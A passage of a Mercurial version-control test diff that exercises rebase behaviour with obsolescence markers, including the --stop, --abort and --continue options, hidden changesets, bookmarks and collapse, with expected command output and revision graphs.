$ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . # working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . - 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A - > EOS - 1 new orphan changesets - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. - - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. - $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF - - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [20] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [20] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== - $ cd .. - $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete4.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete4.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete4.t @@ -18,1639 +18,6 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . - rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. - -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. - - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [10] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | 